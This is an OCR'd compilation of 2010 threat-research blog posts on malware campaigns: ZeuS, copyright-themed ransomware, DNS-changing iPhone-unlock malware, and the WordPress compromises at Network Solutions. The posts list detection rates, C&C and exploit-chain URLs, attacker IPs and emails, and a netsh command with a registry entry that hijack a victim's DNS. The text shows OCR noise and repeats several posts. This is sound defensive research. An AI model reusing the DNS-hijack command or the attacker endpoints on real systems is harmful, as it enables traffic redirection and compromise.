- exe.exe - [14]Backdoor.DMSpammer - Result: 23/39 (58.97 %) 

- svhost.exe - [15]Trojan.Win32.Swisyn; Trojan.Win32.Swisyn.acfo - Result: 33/38 (86.85 %) 

- vot.exe - [16]Trojan.Spy.ZBot.EOR; TSPY _ZBOT.SMG - Result: 15/38 (39.48 %) 


Detection rates for the campaign files obtained through Northwestern Bank’s client-side 
exploit serving campaign: 

- js.js - [17]Mal/ObfJS-CT; JS/Crypted.CV.gen - Result: 3/39 (7.7 %) 

- newplayer.pdf - [18]Exploit.PDF-JS.Gen; Exploit:Win32/Pdfjsc.EP - Result: 22/39 (56.42 %) 

- update.exe - [19]Backdoor.DMSpammer - Result: 24/39 (61.54 %) 


The sampled update.exe phones back to the following locations: 

usrdomainn.net /n2/checkupdate.txt - 122.70.149.12, AS38356, TimeNet - Email: 
paulapruynel3@gmail.com 

usrdomainn.net /n2/tuktuk.php 

usrdomainn.net /n2/getemails.php 

usrdomainnertwesar.net /n2/getemails.php 

usrdomainnertwesar.net /n2/checkupdate.txt 

usrdomainnertwesar.net /n2/tuktuk.php 


AS38356, TimeNet is most recently seen in the migration of the money mule recruiters 
"[20]Keeping Money Mule Recruiters on a Short Leash - Part Four", with tuktuk.php literally 
translated as herehere.php. 


The site is now clean, however, the iFrame domains and ZeuS C &Cs remain active. 


This post has been reproduced from [21]Dancho Danchev’s blog. Follow him [22]on Twitter. 
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. http: //ddanchev. blogspot .com/2010/03/scareware-sinowal-client-side-exploits.htm 
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6.4.4 Copyright Violation Alert Themed Ransomware in the Wild (2010-04-12 19:51) 


Warning! Piracy detected! 


Pirated content was detected on your PC! 
You are seriously violating copyright by: 
Media files downloaded from torrents 
- Pirated movies from peer-to-peer networks 
- Cracked software from file-sharing services 
Copyright fund has recieved report and has started an 
investigation. You'll recieve subopena in a week 


~™ 
(cy copyright 


The copyright violation alert themed ransomware campaign ( [1]Copyright violation alert 
ransomware in the wild; [2]ICPP Copyright Foundation is Fake ) is not just a novel approach 
for extortion of the highest amount of money seen in ransomware variants so far, but also, 
offers interesting clues into the multitasking mentality of the cybercriminals whose campaigns 
have already been profiled. 


The bogus ICPP Foundation (icpp-online.com - 193.33.114.77 - Email: ovenersbox@yahoo.com) 
describes itself as: 


"We are a law firm which specialises in assisting intellectual property rights holders ex- 
ploit and enforce their rights globally. Illegal file sharing costs the creative industries billions 
of pounds every year. The impact of this is huge, resulting in job losses, declining profit 
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margins and reduced investment in product development. Action needs to be taken and we 
believe a coordinated effort is needed now, before irreparable damage is done. 


*icpp-online.com 
193.33,114.0/23 ———_—4S-g AS42473 


i¢pp-online.com 


rieck-www02.cusserver.anexia at 


mail.icpp-online.com 


We have developed effective and unique methods for organisations to enforce their intellectual 
rights. By working effectively with forensic IT experts, law firms and anti-piracy organisations, 
we seek to eliminate the illegal distribution of copyrighted material through our revolutionary 
business model. Whilst many companies offer anti-piracy measures, these are often costly 
and ineffective. Our approach is quite the opposite, it generates revenue for rights holders 
and effectively decreases copyright infringement in a measurable and sustainable way. We 
offer high quality advice and excellent client care by delivering a thorough and reliable service. 
If you are interested in our services, please contact us for a no obligation consultation." 


Warning 7 x} 


a Performing this action is construed as refusal to cooperate with the copyright holder and 

= unwillingness to consider pre-trial settlement. If you continue, all the data gathered will be 
passes to copyright protection organizations and to the court. We recommend cancelling 
this action and choosing the option "pre-trial settlement". 


cnc 


[3]Responding to the same IP (193.33.114.77) are also: 
green-stat.com - Email: tahli@yahoo.com 
media-magnats.com - Email: tahli@yahoo.com 


Where do we know the tahli@yahoo.com email from? From the "[4]The Koobface Gang 
Wishes the Industry "Happy Holidays" where it was used to register Zeus C &Cs as well as 
money mule recruitment domains, from the "[5]Money Mule Recruitment Campaign Serving 
Client-Side Exploits" where it was used to register the client-side exploit serving mule recruit- 
ment site, and most recently from "[6]Keeping Money Mule Recruiters on a Short Leash - Part 
Four" used in another mule recruitment site registration. 


What’s particularly interesting about the ransomware variant, is the fact that it has been 
localized to the following languages: Czech, Danish, Dutch, English, French, German, Italian, 
Portuguese, Slovak and Spanish, as well as the fact that it will attempt to build its torrents list 
from actual torrent files it is able to locate within the victim’s hard drive. 
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Detection rates, for the ransomware: 

- mm.exe - [7]Win32/Adware.Antipiracy - Result: 2/39 (5.13 %) 

- iqmanagenr.exe - [8]Rogue:W32/DotTorrent.A - Result: 5/39 (12.83 %) 
- uninstall.exe - [9]Reser.Reputation.1 - Result: 1/39 (2.57 %) 


Upon execution, the sample phones back to 91.209.238.2/m5install/774/1 (AS48671, GROZA- 
AS Cyber Internet Bunker) with the actual affiliate ID "afid=774" found in the settings.ini file. 
Active on the same IP are also related phone back directories, from different campaigns" 
91.209.238.2/r2newinstall/freemen/1 

91.209.238.2/r2newinstall/02937/1 

91.209.238.2/r2hit/7/0/0 


This is perhaps the first recorded case of cybercriminals ignoring the basics of micro- 
payments, and emphasizing on profit margins by attempting to extort the amount of $400. 


Related ransomware posts: 

[10]Mac OS X SMS ransomware - hype or real threat? 

[11]iHacked: jailbroken iPhones compromised, $5 ransom demanded 

[12]New LoroBot ransomware encrypts files, demands $100 for decryption 

[13]New ransomware locks PCs, demands premium SMS for removal 

[14]Scareware meets ransomware: “Buy our fake product and we'll decrypt the files” 
[15]Who’s behind the GPcode ransomware? 

[16]How to recover GPcode encrypted files? 


[17]SMS Ransomware Displays Persistent Inline Ads 
[18]SMS Ransomware Source Code Now Offered for Sale 
[19]3rd SMS Ransomware Variant Offered for Sale 
[20]4th SMS Ransomware Variant Offered for Sale 
[21]5th SMS Ransomware Variant Offered for Sale 
[22]6th SMS Ransomware Variant Offered for Sale 


This post has been reproduced from [23]Dancho Danchev’s blog. Follow him [24]on Twitter. 
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9. 
10. 
. http://blogs.zdnet.com/security/?p=480 
12. http://blogs.zdnet .com/security/?p=4748 
13. http://blogs.zdnet .com/security/?p=319 
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14. http://blogs.zdnet .com/security/?p=3014 
15. http://blogs.zdnet .com/security/?p=1259 


16. http://blogs.zdnet .com/security/?p=1280 


17. http: //ddanchev.blogspot.com/2009/09/sms-ransomware-displays—persistent.htm 

18. 
19. http: //ddanchev.blogspot .com/2009/05/3rd-sms-ransomware-variant-offered-for.htm 
20. http: //ddanchev. blogspot .com/2009/07/4th- sms-ransomware-variant-offered-for.htm 
21. http: //ddanchev. blogspot .com/2009/07/5th- sms-ransomware-variant-offered-for.htm 
22. http://ddanchev. blogspot .com/2009/08/6th- sms-ransomware-variant-offered-for.htm 


Warning! Piracy detected! 


Pirated content was detected on your PC! 

You are seriously violating copyright by: 

- Media files downloaded from torrents 

- Pirated movies from peer-to-peer networks 

- Cracked software from file-sharing services 
Copyright fund has recieved report and has started an 
investigation. You'll recieve subopena in a week 


UPDATED: Wednesday, April 28, 2010: The universal license code required in the "Enter a 
previously purchased license code" window is RFHM2-TPX47-YD6RT-H4KDM 


The copyright violation alert themed ransomware campaign ( [1]Copyright violation alert 
ransomware in the wild; [2]ICPP Copyright Foundation is Fake ) is not just a novel approach 
for extortion of the highest amount of money seen in ransomware variants so far, but also, 
offers interesting clues into the multitasking mentality of the cybercriminals whose campaigns 
have already been profiled. 


The bogus ICPP Foundation (icpp-online.com - 193.33.114.77 - Email: ovenersbox@yahoo.com) 
describes itself as: 
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"We are a law firm which specialises in assisting intellectual property rights holders ex- 
ploit and enforce their rights globally. Illegal file sharing costs the creative industries billions 
of pounds every year. The impact of this is huge, resulting in job losses, declining profit 
margins and reduced investment in product development. Action needs to be taken and we 
believe a coordinated effort is needed now, before irreparable damage is done. 


“icpp-online.com 


193.33,114.0/23 ——_—“S-_ ge 442473 


iepp-online.com 
rieck-www02.cusserver.anexiaat 


mail.icpp-online.com 


We have developed effective and unique methods for organisations to enforce their intellectual 
rights. By working effectively with forensic IT experts, law firms and anti-piracy organisations, 
we seek to eliminate the illegal distribution of copyrighted material through our revolutionary 
business model. Whilst many companies offer anti-piracy measures, these are often costly 
and ineffective. Our approach is quite the opposite, it generates revenue for rights holders 
and effectively decreases copyright infringement in a measurable and sustainable way. We 
offer high quality advice and excellent client care by delivering a thorough and reliable service. 
If you are interested in our services, please contact us for a no obligation consultation." 


Warning 


a Performing this action is construed as refusal to cooperate with the copyright holder and 

= unwillingness to consider pre-trial settlement. If you continue, all the data gathered will be 
passes to copyright protection organizations and to the court. We recommend cancelling 
this action and choosing the option "pre-trial settlement". 


cn 


[3]Responding to the same IP (193.33.114.77) are also: 
green-stat.com - Email: tahli@yahoo.com 
media-magnats.com - Email: tahli@yahoo.com 


Where do we know the tahli@yahoo.com email from? From the "[4]The Koobface Gang 
Wishes the Industry "Happy Holidays" where it was used to register Zeus C &Cs as well as 
money mule recruitment domains, from the "[5]Money Mule Recruitment Campaign Serving 
Client-Side Exploits" where it was used to register the client-side exploit serving mule recruit- 
ment site, and most recently from "[6]Keeping Money Mule Recruiters on a Short Leash - Part 
Four" used in another mule recruitment site registration. 
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What’s particularly interesting about the ransomware variant, is the fact that it has been 
localized to the following languages: Czech, Danish, Dutch, English, French, German, Italian, 
Portuguese, Slovak and Spanish, as well as the fact that it will attempt to build its torrents list 
from actual torrent files it is able to locate within the victim’s hard drive. 


Detection rates, for the ransomware: 

- mm.exe - [7]Win32/Adware.Antipiracy - Result: 2/39 (5.13 %) 

- iqmanager.exe - [8]Rogue:W32/DotTorrent.A - Result: 5/39 (12.83 %) 
- uninstall.exe - [9]Reser.Reputation.1 - Result: 1/39 (2.57 %) 


Upon execution, the sample phones back to 91.209.238.2/m5install/774/1 (AS48671, GROZA- 
AS Cyber Internet Bunker) with the actual affiliate ID "afid=774" found in the settings.ini file. 
Active on the same IP are also related phone back directories, from different campaigns" 
91.209.238.2/r2newinstall/freemen/1 

91.209.238.2/r2newinstall/02937/1 

91.209.238.2/r2hit/7/0/0 


This is perhaps the first recorded case of cybercriminals ignoring the basics of micro- 
payments, and emphasizing on profit margins by attempting to extort the amount of $400. 


Related ransomware posts: 

[10]Mac OS X SMS ransomware - hype or real threat? 

[11]iHacked: jailbroken iPhones compromised, $5 ransom demanded 

[12]New LoroBot ransomware encrypts files, demands $100 for decryption 

[13]New ransomware locks PCs, demands premium SMS for removal 

[14]Scareware meets ransomware: “Buy our fake product and we’ll decrypt the files” 
[15]Who’s behind the GPcode ransomware? 

[16]How to recover GPcode encrypted files? 


[17]SMS Ransomware Displays Persistent Inline Ads 
[18]SMS Ransomware Source Code Now Offered for Sale 
[19]3rd SMS Ransomware Variant Offered for Sale 
[20]4th SMS Ransomware Variant Offered for Sale 
[21]5th SMS Ransomware Variant Offered for Sale 
[22]6th SMS Ransomware Variant Offered for Sale 


This post has been reproduced from [23]Dancho Danchev’s blog. Follow him [24]on Twitter. 
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6.4.6 iPhone Unlocking Themed Malware Campaign Spamvertised (2010-04-14 20:20) 


@ iPhone 3G's Mit eDarling 


herausfinden, 
welcher Partner 
wirklich zu 


1 
Here you will learn how to unlock your iphone firmware (baseband) 5.12.01 Ihnen passt! 


Unlock, Jailbrake and “hack"tivate iPhone 3.1.3 


1: Connect your IPhone to the PC 


2: Download the new modified Blackrain ( ) 


3: Open the program you downloaded and click on “make it rain” 
S 


9 


UPDATED: Sunday, April 18, 2010: The folks at [1]EmergingThreats pinged me on the 
fact that immediately after the brief assessment went public, the cybercriminals moved 


3269 


iphone-iphone.info to 174.37.172.68 (SoftLayer Technologies Inc.) Currently responding to 
the same IP are also the following domains known to have been connected with previous 
malware campaigns - startexag.com - Email: venterprize@gmail.com; exposingpics.com, and 
animezhd.com. 


Researchers from [2]BitDefender are reporting on a currently spamvertised malware campaign, 
using a "Unlock, Jailbrake and "hack"tivate iPhone 


3.1.3" theme. 

The spamvertised domain iphone-iphone.info - 188.210.236.181 - Email: iphone- 
iphone.info@protecteddomainservices.com, is enticing the end user into down- 
load the malware’ from pepd.org/blackraln.exe - 188.210.236.109 - Email: 


pepd.org@protecteddomainservices.com. 


(a 


Install 


NAT 
(S) Uninstall blackrain 


blackrain by geohot 


Detection rate: blackraln.exe - [3]Trojan.BAT.AACL - Result: 10/40 (25 %), with the malware 
itself attempting to change the default DNS settings on the infected hosts to the following IP - 
188.210.236.250 (188-210-236-250.hotnet.ro), AS39443, HOTNET-AS SC Hot Net SRL Baia de 
Aries, Nr 3, BI 5B, Sc A, Ap 39, Bucuresti, 6. 


- Creates the following registry entry in an attempt to change default DNS settings: 
3270 


HKEY ~LOCAL —MACHINE\SYSTEM\ControlSet001\Ser vices\Tcpip\Parameters\Interface — s\ 
{5D19E473-BE30-416B-B5C7-D8A091C41D2F } "NameServer" = 188.210.236.250 


- Creates Process - Filename () CommandLine: 

(C:\WINDOWS\system32\NETSH. EXE: interface ip set dns "Local Area Connection" static 
188.210.236.250) As User: () Creation Flags: (CREATE _DEFAULT ERROR _MODE CREATE 
_SUSPENDED) interface ip set dns "wireles network connection" static 188.210.236.250) As 
User: () Creation Flags: (CREATE DEFAULT ERROR MODE CREATE SUSPENDED) 


From Romania, with DNS changing malware. 


This post has been reproduced from [4]Dancho Danchev’s blog. Follow him [5]on Twit- 
ter. 


1. http://www. emergingthreats.net/ 


2. http://www.malwarecity.com/blog/iphone-unlocking-tricks-get-pcs-into-trouble-791.htm 

3. 
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6.4.7 Facebook FarmTown Malvertising Campaign Courtesy of the Koobface Gang 
(2010-04-16 19:03) 


Earlier this week, another malvertising campaign affected a popular community, in the face 
of Facebook’s FarmTown. 


You have to analyze, and cross-check it to believe it. 


Key summary points: 


* the email test@now.net.cn used to register all the domains involved in the malvertising 
campaign, is exclusively used by the Koobface gang for numerous scareware registrations 
seen - 


6.4.8 Dissecting the WordPress Blogs Compromise at Network Solutions 
(2010-04-18 23:31) 


[1] 
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WP - Security Scan 


Name 


UPDATED: Network Solutions [2]issued an update to the situation. 


The folks at Sucuri Security have posted an update on [3]the reemergence of mass site 
compromises at Network Solutions, following [4]last week’s WordPress attack. 


What has changed since last week’s campaign? Several new domains were introduced, 
including new phone back locations, with the majority of new domains once again parked on 
the same IP as they were last week - 64.50.165.169 - AS15244, LUNARPAGES proxy aut-num 
for Lunarpages by MZIMA. 


The exploitation chain of the currently embedded domain is as follows: 
- corpadsinc.com/grep /?spl=3 &br=MSIE &vers=7.0 &s= 

- corpadsinc.com /grep/soc.php 

- corpadsinc.com /grep/load.php?spl=ActiveX pack 

- corpadsinc.com /grep/load.php?spl=pdf 2020 

- corpadsinc.com /grep/load.php?spl=javal 

- corpadsinc.com /grep/j2 _079.jar 


Detection rates for some of the obtained exploits: 
- update.vbe - [5]VBS:Encrypted-gen; Trojan-Downloader.VBS.Agent.yw - Result: 11/40 (27.5 


%) 
- j2 _079.jar - [6JExploit.Java.29; Exploit.Java.CVE-2009-3867.c; JAVA/Byteverify.O - Result: 


5/40 (12.5 %) 


[7] 
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binglbalts.com 


corpadsine.com 


fourkingssports.com 


lasvegastechreportcom 


64.50.164.0/23 —————4S_-gm» asi5244 


mail.mainnetsoll.com 
64.50.165.169 


mail.networkads.net dms00029 lunarbreeze.com 


mainnetsoll.com 
mauiexperts.com 
mauisportsinsider.com 


networkads.net 


Responding to 64.50.165.169 - AS15244, LUNARPAGES proxy aut-num for Lunarpages by 
MZIMA are also: 

binglbalts.com - Email: alex1978a@bigmir.net 

corpadsinc.com - Email: alex1978a@bigmir.net 

fourkingssports.com - Email: alex1978a@bigmir.net 

networkads.net - Email: alex1978a@bigmir.net 

mainnetsoll.com - Email: alex1978a@bigmir.net 

lasvegastechreport.com 

mauiexperts.com 

mauisportsinsider.com 


Upon successful exploitation from corpadsinc.com the campaigns drops load.exe - [8]Tro- 
jan:Win32/Meredrop; Trojan.Win32.Sasfis.a (v) - Result: 7/40 (17.50 %). 


The sample load.exe also phones back to the following locations: 

- nonstopacc.com/tmp /bb.php?v=200 &id=130306319 &b=7231522200 &tm=8_ - 
188.124.16.95 - Email: alex1978a@bigmir.net 

- nonstopacc.com/tmp /bb.php?v=200 &id=130306319 &tid=6 &b=7231522200 &r=1 &tm=9 
- 188.124.16.96 /blackout dem.exe 


Detection rate for blackout dem.exe - [9]Trojan-Dropper - Result: 7/40 (17.5 %) 
which phones back to mazcostrol.com/inst.php ?aid=blackout - 188.124.16.103 - Email: 
alex1978a@bigmir.net. 


Interestingly, the sample attempts to install a Firefox add-on in the following way: 
- %ProgramFiles %\Mozilla Firefox\extensions\ {8CE11043-9A15-4207-A565-0C94C42D590D 
}\chrome\content\timer.xul - MD5: 963136ADAA2B1C823F6COE355800CE02 Detected by 
different vendors as IRC/Flood.gen.h or TROJ BUZUS.ZYX; 
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It’s also worth pointing out that the campaign’s admin panel is pointing to a third-party 
- cybercrime friendly IP that’s currently offline - corpadsinc.com/grep/stats.php -> HTTP/1.1 
302 Found at 217.23.14.25, AS49981, WorldStream = Transit Imports = -CAIW. 


The bottom line - although [10]Network Solutions criticized the [11]media last week, for 
blaming this [12]on Network Solutions, or [13]WordPress itself, the company should realize 
that for the sake of its reputation it should always use the following mentality - "protect the 
end user from himself" when offering any of its services. 


Related WordPress security resources: 

[14]20 Wordpress Security Plug-ins And Tips To keep Hackers Away 
[15]11 Best Ways to Improve WordPress Security 

[16]20+ Powerful Wordpress Security Plugins and Some Tips and Tricks 


This post has been reproduced from [17]Dancho Danchev’s blog. Follow him [18]on Twitter. 


1. http://1.bp.blogspot .com/_wICHhTiQmrA/S8t-VaFFO-I/AAAAAAAAF04/XKb-k5mHFMA/s1600/wp-security-scan. jpg 
2. http: //blog.networksolutions.com/2010/we-feel-your-pain-and-are-working-hard-to-fix-this/ 


3. http://blog.sucuri .net/2010/04/network-solutions—hacked-again.htm 
4. http://blog.sucuri.net/2010/04/network-solutions-hacked-again.htm 
5 


ttp://www.virustotal.com/analisis/1486cf5ccaa9d4539b8743c196ccb448ca4077ccfefadb745468a4c43f 889f 23- 12716 


7. http://4.bp. blogspot .com/_wICHhTiQmrA/S8t2aRXP7d1I/AAAAAAAAE00/K559cE3SGck/s1600/NetworkSolutions_Wordpres 
s_Compromise_April_2010_1.png 
8. ttp://www.virustotal.com/analisis/9e4edc0064249f 2cd5cfcb897a6c66a4ea3b9955e444d14b457e6af abf 16df15- 12716 


9. ttp://www.virustotal.com/analisis/5c84af8ec355cc2d53491426810c2e15579092f 85f 0d27248e13860476c76671- 12716 


iw) 
oe) 


10. 
12. 
| netp://vordpress.org/developent/2010/04/ti1e-peraiasions/ 


. http: //blog.taragana.com/index.php/archive/20-wordpress-security-plug- ins-and-tips-to-keep-hackers-away/ 


. http: //www.problogdesign.com/wordpress/11-best-ways-to-improve-wordpress-security/ 


. http: //speckyboy. com/2009/09/22/20-powerful-wordpress-security-plugins-and-some-tips-and-tricks/ 


17. http://ddanchev.blogspot.com/ 
18. http://twitter.com/danchodanche 


6.4.9 Dissecting the WordPress Blogs Compromise at Network Solutions 
(2010-04-18 23:31) 
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WP - Security Scan 


Name 


UPDATED: Network Solutions [1]issued an update to the situation. 


The folks at Sucuri Security have posted an update on [2]the reemergence of mass site 
compromises at Network Solutions, following [3]last week’s WordPress attack. 


What has changed since last week’s campaign? Several new domains were introduced, 
including new phone back locations, with the majority of new domains once again parked on 
the same IP as they were last week - 64.50.165.169 - AS15244, LUNARPAGES proxy aut-num 


for Lunarpages by MZIMA. 


The exploitation chain of the currently embedded domain is as follows: 
- corpadsinc.com/grep /?spl=3 &br=MSIE &vers=7.0 &s= 

- corpadsinc.com /grep/soc.php 

- corpadsinc.com /grep/load.php?spl=ActiveX _pack 

- corpadsinc.com /grep/load.php?spl=pdf 2020 

- corpadsinc.com /grep/load.php?spl=javal 


- corpadsinc.com /grep/j2 _079.jar 


Detection rates for some of the obtained exploits: 
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- update.vbe - [4]VBS:Encrypted-gen; Trojan-Downloader.VBS.Agent.yw - Result: 11/40 
(27.5 %) 


- j2 _079.jar - [5]JExploit.Java.29; Exploit.Java.CVE-2009-3867.c; JAVA/Byteverify.O - Result: 
5/40 (12.5 %) 


binglbalts.com 


corpadsinc.com 


fourkingssports.com 


lasvegastechreportcom 


—— 64.50.164.0/23 —————4S_g» asi5244 


64.50.165.169 


mail.networkads.net dms00029.lunarbreeze.com 


mainnetsoll.com 
mauiexperts.com 
mauisportsinsider.com 


networkads.net 


Responding to 64.50.165.169 - AS15244, LUNARPAGES proxy aut-num for Lunarpages by 
MZIMA are also: 


binglbalts.com - Email: alex1978a@bigmir.net 
corpadsinc.com - Email: alex1978a@bigmir.net 
fourkingssports.com - Email: alex1978a@bigmir.net 
networkads.net - Email: alex1978a@bigmir.net 


mainnetsoll.com - Email: alex1978a@bigmir.net 


3276 


lasvegastechreport.com 
mauiexperts.com 


mauisportsinsider.com 


Upon successful exploitation from corpadsinc.com the campaigns drops load.exe - [6]Tro- 
jan:Win32/Meredrop; Trojan.Win32.Sasfis.a (v) - Result: 7/40 (17.50 %). 


The sample load.exe also phones back to the following locations: 


- nonstopacc.com/tmp /bb.php?v=200 &id=130306319 &b=7231522200 &tm=8_ - 
188.124.16.95 - Email: alex1978a@bigmir.net 


- nonstopacc.com/tmp /bb.php?v=200 &id=130306319 &tid=6 &b=7231522200 &r=1 &tm=9 


- 188.124.16.96 /blackout _dem.exe 


Detection rate for blackout _dem.exe - [7]Trojan-Dropper - Result: 7/40 (17.5 %) 
which phones back to mazcostrol.com/inst.php ?aid=blackout - 188.124.16.103 - Email: 
alex1978a@bigmir.net. 


Interestingly, the sample attempts to install a Firefox add-on in the following way: 


- %ProgramFiles %\Mozilla Firefox\extensions\ {8CE11043-9A15-4207-A565-0C94C42D590D 
}\chrome\content\timer.xul - MD5: 963136ADAA2B1C823F6COE355800CE02 Detected by 
different vendors as IRC/Flood.gen.h or TROJ _BUZUS.ZYX; 


It’s also worth pointing out that the campaign’s admin panel is pointing to a third-party 
- cybercrime friendly IP that’s currently offline - corpadsinc.com/grep/stats.php -> HTTP/1.1 
302 Found at 217.23.14.25, AS49981, WorldStream = Transit Imports = -CAIW. 


The bottom line - although [8]Network Solutions criticized the [9]media last week, for 
blaming this [10]on Network Solutions, or [11]WordPress itself, the company should realize 
that for the sake of its reputation it should always use the following mentality - "protect the 
end user from himself" when offering any of its services. 


3277 


Related WordPress security resources: 
[12]20 Wordpress Security Plug-ins And Tips To keep Hackers Away 
[13]11 Best Ways to Improve WordPress Security 


[14]20+ Powerful Wordpress Security Plugins and Some Tips and Tricks 


This post has been reproduced from [15]Dancho Danchev’s blog. Follow him [16]on Twitter. 


1. 

2. http: //blog.sucuri.net/2010/04/network-solutions-hacked-again.htm 

3. http: //blog.sucuri .net/2010/04/network-solutions—hacked-again.htm 

4 ttp://www.virustotal.com/analisis/1486cf5ccaa9d4539b8743c196ccb448ca4077ccfefadb745468a4c43f 889f 23- 12716 


8 
9 
10. 


. http: //blog.taragana.com/index.php/archive/20-wordpress-security-plug- ins-and-tips-to-keep-hackers-away/ 


. http: //www.problogdesign.com/wordpress/11-best-ways-to-improve-wordpress-security/ 


. http://speckyboy. com/2009/09/22/20-powerful-wordpress-security-plugins-and-some-tips-and-tricks/ 


15. http: //ddanchev.blogspot.com/ 
16. http://twitter.com/danchodanche 


6.4.10 The DNS Infrastructure of the Money Mule Recruitment Ecosystem 
(2010-04-20 18:46) 
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DNS Infrastructure of the Money Mule Recruitment Ecosystem 


ISPSYSTEM-AS (Belgium) 
TimeNet (China) 13.33% 


18.33% 


EUROACCESS (NL) 
18.33% 


VolumeDrive (U.S) 
18.33% 


KEYWEB-AS (Germany) 
1.67% 


Great Lakes Comnet (U.S) 
PRoadPunner (U.S) 15.00% 
15.00% 


http://ddanchev. blogspot.com | 


What’s the most static element of the vibrant money mule recruitment ecosystem? It’s the 
DNS infrastructure that the the cybercriminals behind the campaigns repeatedly use to push 
new scams. 


This post aims to expose the name servers involved, the associates ASs, using the re- 
search previously conducted on their recruitment campaigns, and their affiliations with 
multiple other cybercrime activities. 


Moreover, it’s main objective is the emphasize on the fact that - cybercrime should stop 
being treated as a country/region specific problem, instead it should be treated as an in- 
ternational problem, with each and every country having its own share of cybercrime activity. 


¢ "The whole is greater than the sum of its parts" - [1]Aristotle 


With money mule recruitment available as-a-service ([2]Standardizing the Money Mule 
Recruitment Process) the post will only detail the activities of what’s referred to as a "mule 
recruitment syndicate", in short, one of the most prolific syndicates with direct connections to 
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numerous related cybercrime campaigns profiled over the past 6 months. 


What makes an impression is the geographical distribution of the name servers. 11 of them 
are based in the Netherlands, another 11 are based in China, followed by 11 more based in 
the United States. Here’s the list of the related ASs and their occurrences: 


AS34305, EUROACCESS Global Autonomous System - The Netherlands - 11 name servers 


AS38356, TimeNet - China - 11 name servers 
¢ AS46664, VolumeDrive - United States - 11 name servers 
¢ AS30517, Great Lakes Comnet, Inc. - United States - 9 name servers 


¢ AS32097, RoadRunner RR-RC-Wholesale Internet, Inc.-KansasCity - United States - 9 
name servers 


AS29182, ISPSYSTEM-AS ISPsystem Autonomous System - Belgium - 8 name servers 


¢ AS31103, KEYWEB-AS Keyweb AG - Germany - 1 name servers 


a 


A Your IP address is 85.12.46.2 
City: Eindhoven 

Country: Netherlands 
Continent: Europe 
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Your IP address is 92.63.111.146 
City: 

Country: Belgium 

Continent: Europe 

Time Zone: GMT+1 more demo? 


Oe at 
tcaBian  Orrertgscies TEE OR 
ad Dae ae hs Se lig 
ie: £m fren 


Your IP address is 64.85.174.143 
City: East Lansing 

Country: United States 
Continent: North America 
Time Zone: EST more demo? 
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Your IP address is 204.124.182.151 x) 
City: Clans Summit 

Country: United States 

Continent: North America 

Time Zone: EST more demo? 


Your IP address is 222.35.143.112 
City: Beijing 
Country: China 
Continent: Asia 
Time Zone: GMT+8 more demo? 


Moreover, this persistent money mule recruitment syndicate has a domain registrar of choice in 
the face of the Turkish, [3]ALATRON BLTD., which is seen in the majority of domain registrations. 


The following active name servers have been gathered from the money mule recruit- 
ment campaigns profiled in previous posts: 


¢ [4]Keeping Money Mule Recruiters on a Short Leash - Part Four 
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¢ [5]Keeping Money Mule Recruiters on a Short Leash - Part Three 
¢ [6]Keeping Money Mule Recruiters on a Short Leash - Part Two 
¢ [7]Keeping Money Mule Recruiters on a Short Leash 


¢ [8]Keeping Reshipping Mule Recruiters on a Short Leash 


A 92.63.111.146 ——NEL-g 92.63.110.0/23 ——“S-> as29182 


nsl.alwaysexit.com ie 


alwaysexit.com 


nsl.alwaysexit.com - 92.63.111.146 - Email: sob@bigmailbox.ru - AS29182, ISPSYSTEM-AS 
ISPsystem Autonomous System 

ns2.alwaysexit.com - 85.12.46.2 - AS34305, EUROACCESS Global Autonomous System 
ns3.alwaysexit.com - 222.35.143.112 - AS38356, TimeNet 


92.63.110.0/23 ———“S-ge as29182 


a 


A 92.63.110.85 PTR 


ei. 
nsl_benjenkinss.cn ™ buddhal.ispvds.com 


benjenkinss.cn 


nsl.benjenkinss.cn - 92.63.110.85 - Email: chunk@qx8.ru - AS29182, ISPSYSTEM-AS ISPsys- 
tem Autonomous System 

ns2.benjenkinss.cn - 85.12.46.2 - AS34305, EUROACCESS Global Autonomous System 
ns3.benjenkinss.cn - 222.35.143.112 - AS38356, TimeNet 


wr 92.63.110.0/23 ———“S_j» as2gis2 


A 92.63.110.85 PTR 


aa 
- buddhal.ispvds.com 


bizrestroom.cc 


ns1.bizrestroom.cc - 92.63.110.85 - Email: hook@5mx.ru - AS29182, ISPSYSTEM-AS ISPsystem 
Autonomous System 

ns2.bizrestroom.cc - 193.104.106.30 - AS34305, EUROACCESS Global Autonomous System 
ns3.bizrestroom.cc - 222.35.143.234 - AS38356, TimeNet 
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a 89.248.166.59 ——NEL_g 99.248.160.0/21 ——“S-m as29073 


nsl.chinegrowth.cc ue 


chinegrowth.cc 


nsl.chinegrowth.cc - 92.63.111.196 - Email: duly@fastermail.ru - AS29182, ISPSYSTEM-AS 
ISPsystem Autonomous System 

ns2.chinegrowth.cc - 85.12.46.4 - AS34305, EUROACCESS Global Autonomous System 
ns3.chinegrowth.cc - 222.35.143.112 - AS38356, TimeNet 


‘ 195.182.57.34 ——MEL-g 195.18257.0/24 ——4S-m as47311 


nsl.cnnandpizza.ce ie 


cnnandpizza.ce 


nsl.cnnandpizza.cc - 87.118.81.75 - Email: bears@fastermail.ru - AS31103, KEYWEB-AS 
Keyweb AG 

ns2.cnnandpizza.cc - 193.104.106.30 - AS34305, EUROACCESS Global Autonomous System 
ns3.cnnandpizza.cc - 222.35.143.236 - AS38356, TimeNet 


64.85.160.0/20 ——— AS30517 
A 64.85.174.143 PTR 


— i... 
nsl.greezly.net i bO04s09le.corenetworks.net 


greezly.net 


nsl.greezly.net - 64.85.174.143 - Email: erupt@qx8.ru - 64.85.160.0/20, AS30517, Great 
Lakes Comnet, Inc. 

ns2.greezly.net - 204.12.217.250 - AS32097, RoadRunner RR-RC-Wholesale Internet, Inc.- 
KansasCity 

ns3.greezly.net - 204.124.182.151 - AS46664, VolumeDrive 


a 89.248.166.45 ——YEL-gs 99.248.160.0/21 ——“S-p as29073 


nstimaninwnite ce Sy 


maninwhite.ce 


nsl.maninwhite.cc - 92.63.111.146 - Email: duly@fastermail.ru - 92.63.110.0/23 - AS29182, 
ISPSYSTEM-AS ISPsystem Autonomous System 
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ns2.maninwhite.cc - 85.12.46.3 - AS34305, EUROACCESS Global Autonomous System 
ns3.maninwhite.cc - 222.35.143.234 - AS38356, TimeNet 


a 89.248.166.60 ——YEL gy 99.248.160.0/21 ——“S-p» 4529073 


nslL.partytimee.cn ue 


partytimee.cn 


nsl.partytimee.cn - 92.63.111.146 - Email: chunk@qx8.ru - 92.63.110.0/23 - AS29182, 
ISPSYSTEM-AS ISPsystem Autonomous System 

ns2.partytimee.cn - 85.12.46.4 - AS34305, EVUROACCESS Global Autonomous System 
ns3.partytimee.cn - 222.35.143.235 - AS38356, TimeNet 


